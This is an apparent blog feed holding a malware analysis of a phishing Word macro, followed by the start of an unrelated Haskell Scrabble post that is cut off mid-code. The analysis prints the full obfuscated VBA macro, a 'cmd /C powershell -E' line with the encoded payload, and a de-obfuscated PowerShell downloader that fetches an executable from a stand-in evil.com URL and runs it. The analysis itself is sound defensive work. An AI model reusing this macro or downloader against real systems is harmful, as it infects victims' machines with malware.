miklós tusz2026-04-16T19:03:21-05:00http://0.0.0.0:4000Miklós Tuszmdtusz@gmail.comDeconstruction of a Malicious Macro2019-08-31T00:00:00-05:00http://0.0.0.0:4000/2019/08/31/deconstructing-a-malicious-email<p>At work recently, a coworker notified me of a suspicious looking email they had received.
They were initially suspicious of the format of the message received, but even more so once they attempted to open the attached <em>password protected Word document</em>.
As you may imagine, there were macros contained within that attempt to run as soon as it’s opened, but luckily my colleague had the good sense to close the file as soon as he was prompted to run them.</p>
<p>Intrigued by this, I poked a bit deeper to see what this was attempting to do.</p>
<!-- fold -->
<h2 id="first-suspicions">First Suspicions</h2>
<p>Ignoring the questionable Word doc attached, the email sent was itself a bit suspicious to me, but according to our sales team, a fairly regular occurence and in line with other PO emails that they have received from large “enterprise” corporations.
The sales team will often receive unsolicied purchase order drafts from large companies, but they typically will come with a bit of a preamble or background for our sales team to work with.
The one came from what appears to be a legitimate domain owned by a legitimate corporation, albeit under the <code class="highlighter-rouge">com.sa</code> domain which is run by Saudi Arabia.
This sort of top-level ownership appears to be fairly common for companies in Saudi Arabia but to me seemed a bit questionable as it means the DNS records are controlled by the Saudi Government, or at least the governing body with ownership of the <code class="highlighter-rouge">com.sa</code> domain, creating subdomains for the companies that register with them.</p>
<p>In any case, this seems as if the email has originated from an authentic origin - perhaps from an internal security breach at the company.
The company name has not been included here because it’s irrelevant and the enterprise world is fairly litigious.</p>
<h2 id="the-attachment-file">The Attachment File</h2>
<p>The Word doc file is password protected for some inexplicable reason.
The password was provided by the attacker in the email, but once you open the file, it will immediately attempt to run some macros.
It seems as though most programs capable of reading Word docs (e.g. Libreoffice and Word) have macros disabled by default which provides a first layer of protection against this type of attack.
For my colleague, this is what had tipped him off once he opened the file.
On top of this, there’s a somewhat hilarious image pasted into the document (distortion and stretching included) and nothing else.</p>
<p><img src="/public/img/word_content_disabled.jpg" alt="Obviously we should enable this macro, right?" /></p>
<p>It’s fairly clear that this is up to no good.</p>
<h2 id="inspecting-the-macros">Inspecting the Macros</h2>
<p>Rather than running the macros, we’ll take a look at what they contain in the macro editor provided by LibreOffice.
There are two present in the file: one which runs on document open, and the other which contains the nasty bits.</p>
<figure class="highlight"><pre><code class="language-visualbasic" data-lang="visualbasic"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="code"><pre><span class="c1">Rem Attribute VBA_ModuleType=VBADocumentModule</span>
<span class="k">Option</span> <span class="n">VBASupport</span> <span class="mi">1</span>
<span class="k">Private</span> <span class="k">Sub</span> <span class="nf">Document_Open</span><span class="p">()</span>
<span class="n">gNk_GqwOH</span><span class="p">.</span><span class="n">G5Bg8_K1A3Dok_yYRJ74</span>
<span class="k">End</span> <span class="k">Sub</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>I don’t know much about Visual Basic at all, but this looks like the <code class="highlighter-rouge">Document_Open</code> method will just call a user-defined method <code class="highlighter-rouge">gNk_GqwOH.G5Bg8_K1A3Dok_yYRJ74</code> after the file is opnened (if macros were enabled).
Let’s see what that method does in the other macro definition file.</p>
<figure class="highlight"><pre><code class="language-visualbasic" data-lang="visualbasic"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
</pre></td><td class="code"><pre><span class="c1">Rem Attribute VBA_ModuleType=VBAModule</span>
<span class="k">Option</span> <span class="n">VBASupport</span> <span class="mi">1</span>
<span class="k">Sub</span> <span class="nf">G5Bg8_K1A3Dok_yYRJ74</span><span class="p">()</span>
<span class="n">U8z6_BPQf_TXrKV_dH_TGDGHk_3_MX_T_ac5qKgkGAoGT626_It1pmzFq</span> <span class="o">=</span> <span class="s">"77II?6~ ~ ^T G>v eak"</span>
<span class="n">gK_IG_</span> <span class="o">=</span> <span class="s">"77 $\ `^V | +F 2 "</span>
<span class="n">AQGrZNIjSCFX9xoB7__m</span> <span class="o">=</span> <span class="s">"77YO 3Vs ^.f~wfG J: / S vn"</span>
<span class="n">K1B4_sBlT4D7xW5EmNhTNeAc_fL6t_ddL_gm__QhY_sC2uxfKDSghdhp1itcVF2OPjkmzH_i794KuwkNrpjek65rb1vXIw_H_TwH__o__sjhiM4_8VupeLmSn2_9UiP_</span> <span class="o">=</span> <span class="s">"WSCrIpt.ShEll"</span>
<span class="n">GmTjLC_9bR</span> <span class="o">=</span> <span class="s">"77nhA"</span>
<span class="n">gJTejCc5aGMZ</span> <span class="o">=</span> <span class="s">"77 x3^'LrBxMI /' , mlXO h.%%t'7DQR|L&s )yF"</span>
<span class="n">iqqsf3KCAUnL6gUMEI_ACI1oS_asa__AP4AdVPSi_v6_e_h_</span> <span class="o">=</span> <span class="s">"77 ' ~k!1V.|#$2 2-Z$e"</span>
<span class="k">On</span> <span class="k">Error</span> <span class="k">Resume</span> <span class="k">Next</span>
<span class="n">rFpH_</span> <span class="o">=</span> <span class="s">"77m,O Ai! @eJxk6A$eX2UPPkZ*cvVvn j# D?1> /jSQ N~3 !"</span>
<span class="n">LLOz_OVQbl2In5_fzzyyX4QMo_KaX_JQ21_gjnTA7Gd__21BeV1O1RkR5__</span> <span class="o">=</span> <span class="s">"77 TOd0 ]HD-`QN/i< l"</span>
<span class="n">ZQZPv1U5BVx2FOGIwH_6__5ZZEjkhdb5_N</span> <span class="o">=</span> <span class="s">"77U44YBs + >wm #qUTn "</span>
<span class="n">cJ_5Gr_ieQro_mAujqJ_v_BzvgHg3Uhdlns6uFPE_lKh_Ym7__xk95_T_J_iYVp_rD_M4_ATP_5_wcoM4Kdyg7epfOxa_qpi6Bz6UP_9_TJ4A8fddvoC1zbuhMpdDYLiNLDkmr1dHevBlkohrJ6J</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">sca_K_an3_ZU_nsLi682PUAzfFsMg42z2LXpKCwvZU_X9th7yG29_UmM</span> <span class="o">=</span> <span class="s">"77oV`$,"</span>
<span class="n">bjW_PC_9_</span> <span class="o">=</span> <span class="s">"77$$&r\5<S nH iL'$HP(< RME v8V>Sk @i"</span>
<span class="n">icpF_AU_BR4SbzvhuXP_3wVh_CkprULN_NPG1qvFVzz_s3AskUdnp7F</span> <span class="o">=</span> <span class="s">"77 ) KD*V4%;DDy=2 B(Zn X^g_s s Q$Oz 6 2 - tfO #x F02eG_QfQ z"</span>
<span class="n">GFgFskYo8Q4NQ4VeKgBgVpkY__az___n_q6c8_yM9_TNjnRIOlvA3_ia</span> <span class="o">=</span> <span class="s">"cm"</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">467</span> <span class="o">-</span> <span class="mi">399</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">106</span> <span class="o">-</span> <span class="mi">74</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">142</span> <span class="o">-</span> <span class="mi">95</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">208</span> <span class="o">-</span> <span class="mi">141</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">182</span> <span class="o">-</span> <span class="mi">150</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">146</span> <span class="o">-</span> <span class="mi">34</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">103</span> <span class="o">-</span> <span class="mi">24</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">360</span> <span class="o">-</span> <span class="mi">273</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">387</span> <span class="o">-</span> <span class="mi">286</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">446</span> <span class="o">-</span> <span class="mi">332</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">260</span> <span class="o">-</span> <span class="mi">145</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">126</span> <span class="o">-</span> <span class="mi">22</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">276</span> <span class="o">-</span> <span class="mi">207</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">214</span> <span class="o">-</span> <span class="mi">138</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">472</span> <span class="o">-</span> <span class="mi">396</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">355</span> <span class="o">-</span> <span class="mi">323</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">419</span> <span class="o">-</span> <span class="mi">374</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">208</span> <span class="o">-</span> <span class="mi">139</span><span class="p">)</span> <span class="o">&</span> <span class="n">Chr</span><span class="p">(</span><span class="mi">229</span> <span class="o">-</span> <span class="mi">197</span><span class="p">)</span>
<span class="n">v___xOoPq_eQCZdq_l_d_6SyGB1_M1hh_</span> <span class="o">=</span> <span class="s">"77_,q&Z8 Wy( &E \ Z*Mftv$H(@F)6V]U 2U $b .< 3"</span>
<span class="n">c_tl7zqZ_7CbwI_nZ_eSCymGwlXk_zW6L_6T7QnIwbwUl</span> <span class="o">=</span> <span class="s">"77+tkyd ]&Z'v*C 5 {;="</span>
<span class="n">oOg7iPe_k5nWbxKR_WIZGErMlq_MLfj_He_LzmSY13j_H6TcS1p_d</span> <span class="o">=</span> <span class="s">"77Qf.4Mi YZRd/ Zh7`_!QG,lxhdh!9!}K[ Z81l IS [ #h3_i"</span>
<span class="n">GFgFskYo8Q4NQ4VeKgBgVpkY__az___n_q6c8_yM9_TNjnRIOlvA3_ia</span> <span class="o">=</span> <span class="n">GFgFskYo8Q4NQ4VeKgBgVpkY__az___n_q6c8_yM9_TNjnRIOlvA3_ia</span> <span class="o">&</span> <span class="s">"DQAKAGYAdQBuAGMAdABpAG8AbgAgAFYAXwB3ADgAXwBGAGEARwBIAGoAbwBzAF8AQQBfAE0AMwA1ACAAKAAgACQAZwA3AGEAMwA4AHQAUwBlAEsAZABtAGYANQBOAEgAIAAsACAAJAByAFIAcABsADIAbgB6AF8AXwBqAHcAbABSAFIAYQBjAFAAbABLAGYATABxAGMAXwBfAGUAIAApAHsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAOwANAAoAUwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIAAtAFMAbwB1AHIAYwBlACAAJABnADcAYQAzADgAdABTAGUASwBkAG0AZgA1AE4ASAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAByAFIAcABsADIAbgB6AF8AXwBqAHcAbABSAFIAY"</span>
<span class="n">TYfJJ1HGp_KlE6p8bR_shMdi_oL</span> <span class="o">=</span> <span class="s">"77lQ n1n 8=TY;Qukb !K. __ GWZ}Tb!vh@2 F8KW"</span>
<span class="n">e4UydWL_hoeSaFiCeweqXvTNN_tL_46Ede</span> <span class="o">=</span> <span class="s">"779Nk m,E8Y$"</span>
<span class="n">mMJEqD</span> <span class="o">=</span> <span class="s">"77gvRu. A` $rhSq"</span>
<span class="n">GFgFskYo8Q4NQ4VeKgBgVpkY__az___n_q6c8_yM9_TNjnRIOlvA3_ia</span> <span class="o">=</span> <span class="n">GFgFskYo8Q4NQ4VeKgBgVpkY__az___n_q6c8_yM9_TNjnRIOlvA3_ia</span> <span class="o">&</span> <span class="s">"QBjAFAAbABLAGYATABxAGMAXwBfAGUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACAAJAByAFIAcABsADIAbgB6AF8AXwBqAHcAbABSAFIAYQBjAFAAbABLAGYATABxAGMAXwBfAGUAIAApADsAIAB9AA0ACgB0AHIAeQB7ACAAJABkAF8AXwBvAF8AaQBsAD0AJABlAG4AdgA6AHQARQBtAFAAKwAnAFwAeABaAGkASgBuAFIAXwA3AGUAawBmADYAXwBmAC4AZQB4AGUAJwA7AA0ACgBWAF8AdwA4AF8ARgBhAEcASABqAG8AcwBfAEEAXwBNADMANQAgACcAaAB0AHQAcAA6AC8ALwB0AHUAbgBnAGcAYQBsAG0AYQBuAGQAaQ"</span>
<span class="n">v_H69ab9_8vY8xrZ_ZbmA_msOx6cL2P_Qy</span> <span class="o">=</span> <span class="s">"77` eq7o^ |N j&gM _ `A! Y%* xC6j%J . nU=;+ dA3"</span>
<span class="n">km_ROZGM85_pfq4wDnDa1sTYg_d8mFho__B_Nn__Um_qh</span> <span class="o">=</span> <span class="s">"77 g Kx) qK"</span>
<span class="n">hGEiXnk1y82HltD6HiqMThXdyX</span> <span class="o">=</span> <span class="s">"77`ai*xsX`r :{[TN+f?7-Z3y #7fDx 7NjA/z4Q?E%]A "</span>
<span class="n">GFgFskYo8Q4NQ4VeKgBgVpkY__az___n_q6c8_yM9_TNjnRIOlvA3_ia</span> <span class="o">=</span> <span class="n">GFgFskYo8Q4NQ4VeKgBgVpkY__az___n_q6c8_yM9_TNjnRIOlvA3_ia</span> <span class="o">&</span> <span class="s">"ByAGkALgBjAG8AbQAvAGMAbAAvAG0AcwAuAHAAZABmACcAIAAkAGQAXwBfAG8AXwBpAGwAOwANAAoAIAB9AGMAYQB0AGMAaAB7AH0A"</span>
<span class="n">YcC_D</span> <span class="o">=</span> <span class="s">"77@.fYB p f~Hvv)[. u $H~ A7L| oVcR i2"</span>
<span class="n">nmz82OODb7xG_Ivl36_B_MTD9sjt9D_mttDeuvKf3UEPeQNK_vff</span> <span class="o">=</span> <span class="s">"77 xQm3Avy @% 6jK 7S"</span>
<span class="n">PIl9_odDMy_WP_F1_jXIg__hhUOqChZeziwL_vB1NG1ZU38Fv5X6ii</span> <span class="o">=</span> <span class="s">"77 ,n "</span>
<span class="k">Set</span> <span class="n">bq_i_N_iXtc_kens51u5_5L_P_7g_v4b_gud__hTr5suH____xwS_O1gU_I5PaZlyA__s_k2HQBEBZvK_2eJ8aRloD__sl_FT_6G8</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="n">K1B4_sBlT4D7xW5EmNhTNeAc_fL6t_ddL_gm__QhY_sC2uxfKDSghdhp1itcVF2OPjkmzH_i794KuwkNrpjek65rb1vXIw_H_TwH__o__sjhiM4_8VupeLmSn2_9UiP_</span><span class="p">)</span>
<span class="n">bHD_PmOw_oNefpF4rJXg4PFcCoW</span> <span class="o">=</span> <span class="s">"77 Cr>zFK/D? ki`'4#3: nY: )*q TaF "</span>
<span class="n">G_d5G_e__VXaZFB_yLG92BDW_oB_k1kFF3sfsjO</span> <span class="o">=</span> <span class="s">"77>D~Q # tS+z Wm @ : O 7F*y7qcWaq "</span>
<span class="n">ikvoxA_T__QMRE___4_3a4dVBuGJgVeR</span> <span class="o">=</span> <span class="s">"77 H@o\& #SMd"</span>
<span class="n">bq_i_N_iXtc_kens51u5_5L_P_7g_v4b_gud__hTr5suH____xwS_O1gU_I5PaZlyA__s_k2HQBEBZvK_2eJ8aRloD__sl_FT_6G8</span><span class="p">.</span><span class="n">Run</span> <span class="n">GFgFskYo8Q4NQ4VeKgBgVpkY__az___n_q6c8_yM9_TNjnRIOlvA3_ia</span><span class="p">,</span> <span class="n">cO_ZfQdJ_yt1mNsWVMC_dbgqY3ghALOYmvN___SX3yu9TtJFPeseY1dArK_mt5IsZKD19nPS3nEnpgMniQGUbsAuHNLt_pn7e_Y_fRFlDPltkyI_8L_SmxG</span>
<span class="n">E6gM_WOW6K_6IdHA_1mklpwo_Pc_ruvmX9_Vhu</span> <span class="o">=</span> <span class="s">"77lCJB Lk5JTXA.SIDsN Q+ C"</span>
<span class="n">hei7F2gCgbGDor4oX_2Go4Lo_</span> <span class="o">=</span> <span class="s">"77@ ^"</span>
<span class="n">XNWIVvRJ5___sgvYC5ZZf_4dJhModFnH4vrd_3_px3tm</span> <span class="o">=</span> <span class="s">"77c5 ~ X`hmI zGAMe(37 i5\BP cF)$ "</span>
<span class="k">End</span> <span class="k">Sub</span>
</pre></td></tr></tbody></table></code></pre></figure>
<p>There’s a lot going on here and it mostly looks like a garbled mess, but one thing in particular stuck out to me to point me in the right direction.
On line 7, we see <code class="highlighter-rouge">"WSCrIpt.ShEll"</code>.
I’m not a windows guy, but I’m <em>fairly</em> sure that’s going to come into play when trying to run a command in either the command prompt or a powershell.</p>
<h2 id="undoing-the-obfuscation">Undoing the Obfuscation</h2>
<p>After looking through the macro script for a bit longer, some patterns pop out that make it clear that this is just (poorly) obfuscated code.</p>
<ol>
<li>There are repeated variable names throughout where we can see strings are concatenated together.</li>
<li>On line 19, we see character codes being used to construct a string.</li>
<li>Some of the longer string sequences look like they may be base64 encoded data.</li>
</ol>
<p>Starting by just simplifying the concatenations and converting the <code class="highlighter-rouge">Chr(123)</code> calls to their ASCII characters, we can get a bit more of a clean view of what is happening.
Most of the code seems to be unused and just is included to make things look more complex than they are, so the meat of it is actually quite simple and just opens a powershell, then passes along a base64 encoded string to execute (as seen by the <code class="highlighter-rouge">-E</code> flag).</p>
<figure class="highlight"><pre><code class="language-visualbasic" data-lang="visualbasic"><span class="c1">Rem Attribute VBA_ModuleType=VBAModule</span>
<span class="k">Option</span> <span class="n">VBASupport</span> <span class="mi">1</span>
<span class="k">Sub</span> <span class="nf">G5Bg8_K1A3Dok_yYRJ74</span><span class="p">()</span>
<span class="k">On</span> <span class="k">Error</span> <span class="k">Resume</span> <span class="k">Next</span>
<span class="k">Set</span> <span class="n">create_shell</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"WSCrIpt.ShEll"</span><span class="p">)</span>
<span class="n">create_shell</span><span class="p">.</span><span class="n">Run</span> <span class="s">"cmD /C pOWershELL -E DQAKAGYAdQBuAGMAdABpAG8AbgAgAFYAXwB3ADgAXwBGAGEARwBIAGoAbwBzAF8AQQBfAE0AMwA1ACAAKAAgACQAZwA3AGEAMwA4AHQAUwBlAEsAZABtAGYANQBOAEgAIAAsACAAJAByAFIAcABsADIAbgB6AF8AXwBqAHcAbABSAFIAYQBjAFAAbABLAGYATABxAGMAXwBfAGUAIAApAHsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAOwANAAoAUwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIAAtAFMAbwB1AHIAYwBlACAAJABnADcAYQAzADgAdABTAGUASwBkAG0AZgA1AE4ASAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAByAFIAcABsADIAbgB6AF8AXwBqAHcAbABSAFIAYQBjAFAAbABLAGYATABxAGMAXwBfAGUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACAAJAByAFIAcABsADIAbgB6AF8AXwBqAHcAbABSAFIAYQBjAFAAbABLAGYATABxAGMAXwBfAGUAIAApADsAIAB9AA0ACgB0AHIAeQB7ACAAJABkAF8AXwBvAF8AaQBsAD0AJABlAG4AdgA6AHQARQBtAFAAKwAnAFwAeABaAGkASgBuAFIAXwA3AGUAawBmADYAXwBmAC4AZQB4AGUAJwA7AA0ACgBWAF8AdwA4AF8ARgBhAEcASABqAG8AcwBfAEEAXwBNADMANQAgACcAaAB0AHQAcAA6AC8ALwB0AHUAbgBnAGcAYQBsAG0AYQBuAGQAaQByAGkALgBjAG8AbQAvAGMAbAAvAG0AcwAuAHAAZABmACcAIAAkAGQAXwBfAG8AXwBpAGwAOwANAAoAIAB9AGMAYQB0AGMAaAB7AH0A"</span><span class="p">,</span> <span class="n">cO_ZfQdJ_yt1mNsWVMC_dbgqY3ghALOYmvN___SX3yu9TtJFPeseY1dArK_mt5IsZKD19nPS3nEnpgMniQGUbsAuHNLt_pn7e_Y_fRFlDPltkyI_8L_SmxG</span>
<span class="k">End</span> <span class="k">Sub</span></code></pre></figure>
<p>This gets called by the on-open document handler. Now what might that base64 endcoded string contain?</p>
<figure class="highlight"><pre><code class="language-powershell" data-lang="powershell"><span class="kr">function</span><span class="w"> </span><span class="nf">V_w8_FaGHjos_A_M35</span><span class="w"> </span><span class="p">(</span><span class="w"> </span><span class="nv">$g7a38tSeKdmf5NH</span><span class="w"> </span><span class="p">,</span><span class="w"> </span><span class="nv">$rRpl2nz__jwlRRacPlKfLqc__e</span><span class="w"> </span><span class="p">){</span><span class="w"> </span><span class="nf">Import-Module</span><span class="w"> </span><span class="nx">BitsTransfer</span><span class="p">;</span><span class="w">
</span><span class="nf">Start-BitsTransfer</span><span class="w"> </span><span class="nt">-Source</span><span class="w"> </span><span class="nv">$g7a38tSeKdmf5NH</span><span class="w"> </span><span class="nt">-Destination</span><span class="w"> </span><span class="nv">$rRpl2nz__jwlRRacPlKfLqc__e</span><span class="p">;(</span><span class="nf">New-Object</span><span class="w"> </span><span class="nt">-com</span><span class="w"> </span><span class="nx">Shell.Application</span><span class="p">)</span><span class="o">.</span><span class="nf">ShellExecute</span><span class="p">(</span><span class="w"> </span><span class="nv">$rRpl2nz__jwlRRacPlKfLqc__e</span><span class="w"> </span><span class="p">);</span><span class="w"> </span><span class="p">}</span><span class="w">
</span><span class="kr">try</span><span class="p">{</span><span class="w"> </span><span class="nv">$d__o_il</span><span class="o">=</span><span class="nv">$</span><span class="nn">env</span><span class="p">:</span><span class="nv">tEmP</span><span class="o">+</span><span class="s1">'\xZiJnR_7ekf6_f.exe'</span><span class="p">;</span><span class="w">
</span><span class="nf">V_w8_FaGHjos_A_M35</span><span class="w"> </span><span class="s1">'http://evil.com/cl/ms.pdf'</span><span class="w"> </span><span class="nv">$d__o_il</span><span class="p">;</span><span class="w">
</span><span class="p">}</span><span class="kr">catch</span><span class="p">{}</span></code></pre></figure>
<p>This too has some basic obfuscation, but it’s clear to see once cleaned up:</p>
<figure class="highlight"><pre><code class="language-powershell" data-lang="powershell"><span class="kr">function</span><span class="w"> </span><span class="nf">evil_func</span><span class="p">(</span><span class="w"> </span><span class="nv">$arg1</span><span class="w"> </span><span class="p">,</span><span class="w"> </span><span class="nv">$arg2</span><span class="w"> </span><span class="p">){</span><span class="w">
</span><span class="nf">Import-Module</span><span class="w"> </span><span class="nx">BitsTransfer</span><span class="p">;</span><span class="w">
</span><span class="nf">Start-BitsTransfer</span><span class="w"> </span><span class="nt">-Source</span><span class="w"> </span><span class="nv">$arg1</span><span class="w"> </span><span class="nt">-Destination</span><span class="w"> </span><span class="nv">$arg2</span><span class="p">;</span><span class="w">
</span><span class="p">(</span><span class="nf">New-Object</span><span class="w"> </span><span class="nt">-com</span><span class="w"> </span><span class="nx">Shell.Application</span><span class="p">)</span><span class="o">.</span><span class="nf">ShellExecute</span><span class="p">(</span><span class="w"> </span><span class="nv">$arg2</span><span class="w"> </span><span class="p">);</span><span class="w">
</span><span class="p">}</span><span class="w">
</span><span class="kr">try</span><span class="p">{</span><span class="w">
</span><span class="nv">$exe_path</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$</span><span class="nn">env</span><span class="p">:</span><span class="nv">tEmP</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s1">'\xZiJnR_7ekf6_f.exe'</span><span class="p">;</span><span class="w">
</span><span class="nf">evil_func</span><span class="w"> </span><span class="s1">'http://evil.com/cl/ms.pdf'</span><span class="w"> </span><span class="nv">$exe_path</span><span class="p">;</span><span class="w">
</span><span class="p">}</span><span class="kr">catch</span><span class="p">{}</span></code></pre></figure>
<p>We can see that the macro attempts to download a “pdf” to a tempporary directory, then attempt to run the exe.
I am guessing that the reason for saving the file as a pdf in transfer is to try to get around corporate tools that may attempt to block downloads with <code class="highlighter-rouge">.exe</code> extensions.
Note that that would be a horrible way to prevent viruses, but some enterprises do some crazy things.
The domain used for the file hosting (changed by me to be <code class="highlighter-rouge">evil.com</code> for this post but you can still find the original if you look hard enough…) seems to be still online - I haven’t a clue if it’s a legitimate site or business.
The domain is registered with contact information in Indonesia, and curiously, the contact’s email address is present as well, which makes me think that the domain was just used temporarily for hosting - likely using a vulnerability in an outdated wordpress install.
That, or the attacker is incredibly, unbelievably sloppy and used a domain tied to their name and address.</p>
<p>Unfortunately, the file is no longer hosted at that path and we just receive a 404 response, but when I had initially got to this point, the file was still live and downloaded successfully.
I made the mistake of not saving the file before closing down the VM I was working in, but it was fairly small and had lots of inline XML strings in the binary.</p>
<h2 id="y-tho">Y Tho?</h2>
<p>Based on the accompanying email message and PO draft (which included information that would have been specifically crafted based on our business and product), I suspect that the attacker had specifically targetted our business and intended to install either a keylogger or ransomware onto the machine the macro could run on.</p>
<p>The fact that there’s still emails that are sent like this is a bit surprising to me, and it makes me extremely concerned with the state of computer literacy in the world.
The colleague of mine who reported this to me is fairly computer-savvy, but even he was a bit unsure of whether this was a legitimate email that just was having issues opening on his computer, or if it was malicious.
I can entirely imagine many people opening the email and enabling the macros without giving a second thought.
What’s more concerning to me is that we use Outlook at work, hosted and provided by Azure.
We are not a large organization (less than 50 employees), but we receive spam and phishing emails of this sort on a near daily basis.
It’s possible that we simply haven’t configured some spam filter to be strict enough, but it is still surprising to me that this is an issue at all - when we used Google Apps for our email and accounts, we received <em>no</em> spam or phishing emails.</p>
<p>This is likely not the last email attack we will see, and very likely you or your organization will encounter this sort of thing at some point too so it goes to remind you, dear reader, to educate your colleagues and managers, and do what you can to keep systems secure.</p>
"Haskell": 17 Points in Scrabble™2015-11-20T00:00:00-06:00http://0.0.0.0:4000/2015/11/20/haskell-scrabble<p><em>This has been in my <code class="highlighter-rouge">_drafts</code> directory for months and now that I re-read it, it seems trivial, but it’s time to start good habits and just post things instead of feeling like it’s inadequate.</em></p>
<p>I’ve been in the process of learning Haskell for a while now, but only recently have gotten to a point where I feel like I know enough to actually <em>do</em> anything with it. While laying in bed, I was thinking of things I could write that would be easy, but not too easy and decided a simple little program to find all the possible word combinations given a set of Scrabble™ tiles would be a good start, and also a good way to demonstrate how concise Haskell code can be.</p>
<!-- fold -->
<h2 id="the-problem">The Problem</h2>
<p>The problem at hand is a good one for learning, particularly because it involves a problem that nearly everyone has faced while playing Scrabble™ and can easily be reasoned about in your head.</p>
<blockquote>
<p>Given a set of tiles, find all combinations of valid Scrabble™ words that can be played</p>
</blockquote>
<p>We’ll ignore the possibility of appending tiles to existing words for now and just focus on finding possibilities from a dictionary. I used this Scrabble™ dictionary CSV from <a href="https://github.com/zeisler/scrabble/blob/master/db/dictionary.csv.gz">here</a>. My first thought for how to get the job done was to make a list of possible letter combinations from the set we have, then, find the words that are common to both our list, and the dictionary. Pretty simple in our heads, but a bit of a messy process in languages like Javascript:</p>
<figure class="highlight"><pre><code class="language-js" data-lang="js"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre></td><td class="code"><pre><span class="kd">function</span> <span class="nx">permute</span><span class="p">(</span><span class="nx">x</span><span class="p">){</span>
<span class="nx">x</span> <span class="o">=</span> <span class="nx">x</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">stack</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">permutations</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">function</span> <span class="nx">doPermutation</span><span class="p">(){</span>
<span class="k">if</span><span class="p">(</span><span class="nx">x</span><span class="p">.</span><span class="nx">length</span> <span class="o">===</span> <span class="mi">0</span><span class="p">){</span>
<span class="nx">permutations</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">stack</span><span class="p">.</span><span class="nx">slice</span><span class="p">().</span><span class="nx">join</span><span class="p">(</span><span class="dl">''</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">for</span><span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">x</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">){</span>
<span class="kd">var</span> <span class="nx">tmp</span> <span class="o">=</span> <span class="nx">x</span><span class="p">.</span><span class="nx">splice</span><span class="p">(</span><span class="nx">i</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="nx">stack</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">tmp</span><span class="p">);</span>
<span class="nx">doPermutation</span><span class="p">();</span>
<span class="nx">stack</span><span class="p">.</span><span class="nx">pop</span><span class="p">();</span>
<span class="nx">x</span><span class="p">.</span><span class="nx">splice</span><span class="p">(</span><span class="nx">i</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nx">tmp</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">doPermutation</span><span class="p">();</span>
<span class="k">return</span> <span class="nx">permutations</span><span class="p">;</span>
